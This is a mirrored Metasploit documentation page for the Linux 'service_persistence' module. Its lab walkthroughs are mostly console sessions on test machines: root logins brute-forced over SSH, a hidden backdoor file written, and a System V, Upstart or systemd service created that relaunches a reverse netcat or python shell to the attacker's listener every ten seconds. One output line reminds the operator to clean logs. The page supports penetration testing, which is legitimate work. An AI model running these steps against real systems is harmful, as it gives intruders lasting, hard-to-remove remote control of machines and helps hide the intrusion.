dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/linux/local/service_persistence.md

12 KiB
Raw Permalink Blame History

Creating A Testing Environment

This module has been tested against:

  1. Kali 2.0 (System V)
  2. Ubuntu 14.04 (Upstart)
  3. Ubuntu 16.04 (systemd)
  4. Ubuntu 16.04 (systemd user)
  5. Centos 5 (System V)
  6. Fedora 18 (systemd)
  7. Fedora 20 (systemd)

Verification Steps

  1. Start msfconsole
  2. Exploit a box via whatever method
  3. Do: use exploit/linux/local/service_persistence
  4. Do: set session #
  5. Do: set verbose true
  6. Do: set payload cmd/unix/reverse_python or payload cmd/unix/reverse_netcat depending on system.
  7. Optional Do: set SHELLAPTH /bin if needed for compatibility on remote system.
  8. Do: set lhost
  9. Do: exploit
  10. Do: use exploit/multi/handler
  11. Do: set payload cmd/unix/reverse_python or payload cmd/unix/reverse_netcat depending on system.
  12. Do: set lhost
  13. Do: exploit -j
  14. Kill your shell (if System V, reboot target). Upstart/systemd wait 10sec
  15. Get Shell

Options

target

There are several targets selectable, which all have their own issues.

  1. Automatic: Detect the service handler automatically based on running which to find the admin binaries
  2. System V: There is no automated restart, so while you'll get a shell, if it crashes, you'll need to wait for a init shift to restart the process automatically (like a reboot). This logs to syslog or /var/log/.log and .err
  3. Upstart: Logs to its own file. This module is set to restart the shell after a 10sec pause, and do this forever.
  4. systemd and systemd user: This module is set to restart the shell after a 10sec pause, and do this forever.

BACKDOOR_PATH

If you need to change the location where the backdoor is written (like on CentOS 5), it can be done here. Default is /usr/local/bin

SERVICE

The name of the service to create. If not chosen, a 7 character random one is created.

SHELL_NAME

The name of the file to write with our shell. If not chosen, a 5 character random one is created.

Scenarios

System V (Centos 5 - root - chkconfig)

Get initial access

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.199.131
rhosts => 192.168.199.131
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set password centos
password => centos
msf auxiliary(ssh_login) > exploit

[*] 192.168.199.131:22 SSH - Starting bruteforce
[+] 192.168.199.131:22 SSH - Success: 'root:centos' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh Linux localhost.localdomain 2.6.18-398.el5 #1 SMP Tue Sep 16 20:51:48 EDT 2014 i686 i686 i386 GNU/Linux '
[*] Command shell session 1 opened (192.168.199.128:49359 -> 192.168.199.131:22) at 2016-06-22 14:27:38 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Install our callback service (system_v w/ chkconfig). Note we change BACKDOOR_PATH since /usr/local/bin isnt in the path for CentOS 5 services.

msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence
msf exploit(service_persistence) > set session 1
session => 1
msf exploit(service_persistence) > set verbose true
verbose => true
msf exploit(service_persistence) > set BACKDOOR_PATH /bin
BACKDOOR_PATH => /bin
msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf exploit(service_persistence) > set lhost 192.168.199.128
lhost => 192.168.199.128
msf exploit(service_persistence) > exploit

[*] Started reverse handler on 192.168.199.128:4444 
[*] Writing backdoor to /bin/GUIJc
[*] Max line length is 65537
[*] Writing 95 bytes in 1 chunks of 329 bytes (octal-encoded), using printf
[*] Utilizing System_V
[*] Utilizing chkconfig
[*] Writing service: /etc/init.d/HqdezBF
[*] Max line length is 65537
[*] Writing 1825 bytes in 1 chunks of 6409 bytes (octal-encoded), using printf
[*] Enabling & starting our service
[*] Command shell session 2 opened (192.168.199.128:4444 -> 192.168.199.131:56182) at 2016-06-22 14:27:50 -0400

Reboot the box to prove persistence

reboot
^Z
Background session 2? [y/N]  y
msf exploit(service_persistence) > use exploit/multi/handler
msf exploit(handler) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf exploit(handler) > set lhost 192.168.199.128
lhost => 192.168.199.128
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.199.128:4444 
[*] Starting the payload handler...
[*] Command shell session 3 opened (192.168.199.128:4444 -> 192.168.199.131:44744) at 2016-06-22 14:29:32 -0400

Upstart (Ubuntu 14.04.4 Server - root)

Of note, I allowed Root login via SSH w/ password only to gain easy initial access

Get initial access

msf auxiliary(ssh_login) > exploit

[*] 10.10.60.175:22 SSH - Starting bruteforce
[+] 10.10.60.175:22 SSH - Success: 'root:ubuntu' 'uid=0(root) gid=0(root) groups=0(root) Linux ubuntu 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:27 UTC 2016 i686 i686 i686 GNU/Linux '
[*] Command shell session 1 opened (10.10.60.168:43945 -> 10.10.60.175:22) at 2016-06-22 08:03:15 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Install our callback service (Upstart)

msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence
msf exploit(service_persistence) > set session 1
session => 1
msf exploit(service_persistence) > set verbose true
verbose => true
msf exploit(service_persistence) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf exploit(service_persistence) > set lhost 10.10.60.168
lhost => 10.10.60.168
msf exploit(service_persistence) > exploit

[*] Started reverse handler on 10.10.60.168:4444 
[*] Writing backdoor to /usr/local/bin/bmmjv
[*] Max line length is 65537
[*] Writing 429 bytes in 1 chunks of 1650 bytes (octal-encoded), using printf
[*] Utilizing Upstart
[*] Writing /etc/init/Hipnufl.conf
[*] Max line length is 65537
[*] Writing 236 bytes in 1 chunks of 874 bytes (octal-encoded), using printf
[*] Starting service
[*] Dont forget to clean logs: /var/log/upstart/Hipnufl.log
[*] Command shell session 5 opened (10.10.60.168:4444 -> 10.10.60.175:44368) at 2016-06-22 08:23:46 -0400

And now, we can kill the callback shell from our previous session

^Z
Background session 5? [y/N]  y
msf exploit(service_persistence) > sessions -i 1
[*] Starting interaction with 1...

netstat -antp | grep 4444
tcp        0      0 10.10.60.175:44368      10.10.60.168:4444       ESTABLISHED 1783/bash
tcp        0      0 10.10.60.175:44370      10.10.60.168:4444       ESTABLISHED 1789/python
kill 1783
[*] 10.10.60.175 - Command shell session 5 closed.  Reason: Died from EOFError
kill 1789

Now with a multi handler, we can catch Upstart restarting the process every 10sec

msf > use exploit/multi/handler 
msf exploit(handler) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf exploit(handler) > set lhost 10.10.60.168
lhost => 10.10.60.168
msf exploit(handler) > exploit

[*] Started reverse handler on 10.10.60.168:4444 
[*] Starting the payload handler...
[*] Command shell session 3 opened (10.10.60.168:4444 -> 10.10.60.175:44390) at 2016-06-22 08:26:48 -0400

systemd (Ubuntu 16.04 Server - root)

Ubuntu 16.04 doesn't have many of the default shell options, however cmd/unix/reverse_netcat works. While python shellcode works on previous systems, on 16.04 the path is python3, and therefore python will fail the shellcode.

Get initial access

msf exploit(handler) > use exploit/linux/local/service_persistence
msf exploit(service_persistence) > set session 1
session => 1
msf exploit(service_persistence) > set verbose true
verbose => true
msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf exploit(service_persistence) > set lhost 192.168.199.128
lhost => 192.168.199.128
msf exploit(service_persistence) > exploit

[*] Started reverse handler on 192.168.199.128:4444 
[*] Writing backdoor to /usr/local/bin/JSRCF
[*] Max line length is 65537
[*] Writing 103 bytes in 1 chunks of 361 bytes (octal-encoded), using printf
[*] Utilizing systemd
[*] /lib/systemd/system/YelHpCx.service
[*] Max line length is 65537
[*] Writing 151 bytes in 1 chunks of 579 bytes (octal-encoded), using printf
[*] Enabling service
[*] Starting service
[*] Command shell session 7 opened (192.168.199.128:4444 -> 192.168.199.130:47050) at 2016-06-22 10:35:07 -0400

^Z
Background session 7? [y/N]  y

Kill the process on the Ubuntu target box via local access #good_admin

root@ubuntu:/etc/systemd/system/multi-user.target.wants# netstat -antp | grep 4444
tcp        0      0 192.168.199.130:47052   192.168.199.128:4444    ESTABLISHED 5632/nc
root@ubuntu:/etc/systemd/system/multi-user.target.wants# kill 5632

And logically, we lose our shell

 [*] 192.168.199.130 - Command shell session 7 closed.  Reason: Died from EOFError

Now with a multi handler, we can catch systemd restarting the process every 10sec

msf exploit(service_persistence) > use exploit/multi/handler 
msf exploit(handler) > show options

Module options (exploit/multi/handler):

 Name  Current Setting  Required  Description
 ----  ---------------  --------  -----------

Payload options (cmd/unix/reverse_netcat):

 Name   Current Setting  Required  Description
 ----   ---------------  --------  -----------
 LHOST  192.168.199.128  yes       The listen address
 LPORT  4444             yes       The listen port

Exploit target:

 Id  Name
 --  ----
 0   Wildcard Target

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.199.128:4444 
[*] Starting the payload handler...
[*] Command shell session 8 opened (192.168.199.128:4444 -> 192.168.199.130:47056) at 2016-06-22 10:37:30 -0400

systemd user (Ubuntu 16.04 Server - vagrant)

msf5 exploit(linux/local/service_persistence) > options

Module options (exploit/linux/local/service_persistence):

  Name           Current Setting  Required  Description
  ----           ---------------  --------  -----------
  BACKDOOR_PATH  /tmp             yes       Writable path to put our shell
  SERVICE                         no        Name of service to create
  SESSION                         yes       The session to run this module on
  SHELL_NAME                      no        Name of shell file to write


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.28.128.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   4   systemd user


msf5 exploit(linux/local/service_persistence) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Writing backdoor to /tmp/PPpCF
[*] Max line length is 65537
[*] Writing 94 bytes in 1 chunks of 330 bytes (octal-encoded), using printf
[*] Creating user service directory
[*] Writing service: /home/vagrant/.config/systemd/user/OzzdRBC.service
[*] Max line length is 65537
[*] Writing 203 bytes in 1 chunks of 778 bytes (octal-encoded), using printf
[*] Reloading manager configuration
[*] Enabling service
[*] Starting service: OzzdRBC
[*] Command shell session 2 opened (172.28.128.1:4444 -> 172.28.128.3:52564) at 2019-03-06 00:22:40 -0600

id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)
uname -a
Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux